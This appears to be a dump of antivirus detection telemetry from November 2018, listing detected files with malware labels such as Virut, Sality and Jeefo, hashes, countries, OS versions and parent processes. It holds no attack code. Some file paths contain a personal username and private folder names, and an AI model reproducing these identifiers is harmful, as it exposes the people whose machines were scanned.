  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3fafbd95a0d63ca588eb3a76deaa41c632bde63df9db5663a7f66b534e58c369', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:50:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3fafbd95a0d63ca588eb3a76deaa41c632bde63df9db5663a7f66b534e58c369', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T04:47:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:01:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:07:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:05:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='C:\\Windows\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=44520, timestamp='2018-11-04T11:14:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:14:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:11:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:06:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='бланк письма 2014 пособие.exe', filepath='F:\\Проф\\Бланк письма 2014 пособие.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='40b170ee3189ac12ebd377ec75402037e2213c6654ee16babac198c31513e6cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='бланк письма 2014 пособие.exe', filepath='\\\\?\\F:\\Проф\\Бланк письма 2014 пособие.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='40b170ee3189ac12ebd377ec75402037e2213c6654ee16babac198c31513e6cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:08:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:08:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T04:11:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T04:11:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\41F4E1CA0527EF475D60BA8BB930C03A3B2118410FADDB35C3FBD949298AE520', filesize=812000, name='W32/Parite.#M1.#R1'), hash='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\41F4E1CA0527EF475D60BA8BB930C03A3B2118410FADDB35C3FBD949298AE520', filesize=812000, name='W32/Parite.#M1.#R1'), hash='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:23:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182604.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp103\\A0182604.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='421c7f4b9c1e395597280f18b24c2bcbedc132dbdfd989724fed81674d722a0e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:16:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152014-ff7a0078', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d9713e5\\AVSCAN-20181104-151919-FAAC7A8E\\AVSCAN-20181104-152014-FF7A0078', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='423193b530b82466c1c001b1347fcac61f8a0f4dd1402e911b85d4458d8bd26b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_audacity_vhvpcd.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_audacity_VhvPCd.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='423193b530b82466c1c001b1347fcac61f8a0f4dd1402e911b85d4458d8bd26b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T17:17:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_audacity_vhvpcd.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_audacity_VhvPCd.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='423193b530b82466c1c001b1347fcac61f8a0f4dd1402e911b85d4458d8bd26b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T17:17:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191442-f071cad5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc727c94\\AVSCAN-20181104-190515-975C53E3\\AVSCAN-20181104-191442-F071CAD5', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='435b46a9efc0b116328792c0436ee25fab8bff68bf08c26299066126b4181fe7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:14:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel USB 3.0 Driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='43c78f49715d2f67d40bfe010a3d9d81a7ff22eeca4f82b9a24d8edd360f8b21', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:29:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmpeywja52m', filepath='/tmp/tmpeywja52m', filesize=448000, name='TR/Crypt.ZPACK.Gen8.#M2.#R700208'), hash='448acf244dba595c2df19c04c0e918e6cdb5296365c62b873885f788f753d223', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:22:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmpuuq3zcr9', filepath='/tmp/tmpuuq3zcr9', filesize=448000, name='TR/Crypt.ZPACK.Gen8.#M2.#R700208'), hash='448acf244dba595c2df19c04c0e918e6cdb5296365c62b873885f788f753d223', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T15:45:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmpyxpne0xm', filepath='/tmp/tmpyxpne0xm', filesize=448000, name='TR/Crypt.ZPACK.Gen8.#M2.#R700208'), hash='448acf244dba595c2df19c04c0e918e6cdb5296365c62b873885f788f753d223', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-064827-48ac600d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6814c783\\AVSCAN-20181104-063216-B01377BC\\AVSCAN-20181104-064827-48AC600D', filesize=3584000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='44b78ecff8902fbea0bf64454d8be5d3491cf285aef15af4898fefe00eb4cef8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:48:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180133-73086671', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2977c28d\\AVSCAN-20181104-155018-84E92D58\\AVSCAN-20181104-180133-73086671', filesize=76000, name='TR/Rogue.1499327.#M1.#R1'), hash='44cabd82e43fe98c0db76239c17febfff2a361554bea3634f9124c4d3142cebc', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:01:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mighost.exe', filepath='E:\\win7\\support\\migwiz\\mighost.exe', filesize=320000, name='W32/Sality.#M1.#R1'), hash='45631a1eab35d2d8501e3220d55611e3d572bd516e785eef73aea6735871d9fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T12:38:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:265HsU8B6EKUn9k0.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T21:50:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T13:33:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maxpayne.exe', filepath='E:\\العاب\\العاب الوكيل\\4x4\\4\\New Briefcase\\Max Payne\\MaxPayne.exe', filesize=5120000, name='W32/Sality.AT.#M1.#R1'), hash='45919ef2bbec79687f66a6827276be60fdd4fb2cf45eb913f23209cfb256f9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:09:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000904e', filepath='C:\\Windows\\Temp\\962baaef-7c68-4139-96a5-cf3967f6676d\\tmp00000308\\tmp0000904e', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='45cc0b31e628760cd0625bb0a661d72cdfe416405dd3ad0bdd1fe648e2ed74e7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T14:20:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='4612cd30b31475fa303b4768a58bbd90331993e09f1dace8d07936d18425197e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:26:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182203.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp95\\A0182203.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='46364ba1424c62b9b1405113f2cffa88d9dac0c34752eb4baefb3b813cbc3409', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:41Z'), dt=datetime.date(2018, 11, 4)),
